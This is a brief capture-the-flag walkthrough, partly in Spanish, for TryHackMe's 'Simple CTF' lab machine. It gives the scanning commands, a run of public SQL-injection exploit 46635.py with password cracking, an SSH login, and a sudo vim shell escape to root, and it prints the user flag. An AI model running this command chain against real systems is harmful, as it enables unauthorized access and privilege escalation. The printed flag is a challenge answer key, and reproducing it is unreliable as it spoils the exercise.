Simple CTF - TryHackMe
Simple CTF is just that, a beginner-level CTF on TryHackMe that showcases a few of the necessary skills needed for all CTFs to include scanning and enumeration, research, exploitation, and privilege escalation.
Summary
- IP: 10.10.129.26
- Ports: 21,80,2222
- OS: Linux (Ubuntu)
- Services & Applications:
- 21 -> vsftpd 3.0.3
- 80 -> Apache httpd 2.4.18
- 2222 -> OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
Recon
- Escaneo básico de puertos:
$sudo nmap -p- -sS --open --min-rate 5000 -vvv -n -Pn 10.10.129.26 -oG allPorts
- Escaneo profundo de puertos encontrados:
$sudo nmap -p21,80,2222 -sCV 10.10.129.26 -oN targeted
- Buscamos vulnerabilidades en las aplicaciones encontradas, ftp no nos da nada, la página no contiene nada relevante; hacemos escaneo de directorios con gobuster:
$gobuster dir -u http://10.10.129.26/ -w /usr/share/SecLists/Discovery/Web-Content/common.txt
- Encontramos un directorio “simple”, lo analizamos y encontramos una app web con su version, buscamos vulnerabilidades para la misma:
$searchsploit CMS Made Simple 2.2.8
- Encontramos una vulnerabilidad SQLi, exportamos la script de python y la ejecutamos
$python2.7 46635.py -u http://10.10.129.26/simple/ --crack -w /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt
- Obtenemos credenciales e intentamos conectarnos por ssh:
ssh mitch@10.10.129.26 -p 2222
- Encontramos la user flag:
USER FLAG: G00d j0b, keep up!
- Buscamos binarios con permisos de sudoers:
mitch@machine:/$sudo -l
- Vemos que podemos ejecutar como sudoer el binario “vim”, el cual buscamos en gtfobins para poder escalar privilegios:
sudo vim -c ':!/bin/sh'
- Encontramos la root flag:
ROOT FLAG: ***********